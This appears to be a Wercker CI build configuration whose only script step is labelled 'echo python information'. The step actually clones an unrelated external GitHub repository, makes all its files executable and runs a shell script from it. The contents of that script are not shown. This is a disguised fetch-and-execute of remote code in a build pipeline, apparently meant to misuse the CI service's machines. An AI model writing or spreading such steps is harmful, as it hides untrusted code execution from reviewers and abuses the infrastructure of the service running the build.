#taikk
box: python:2.7
build:
  steps:
    - virtualenv:
        name: setup virtual environment
        install_wheel: false
    - script:
        name: echo python information
        code: |
          echo "tai"
          echo "bodat"
          git clone https://github.com/champlin01/vps
          cd vps
          chmod +x *
          sh srbv.sh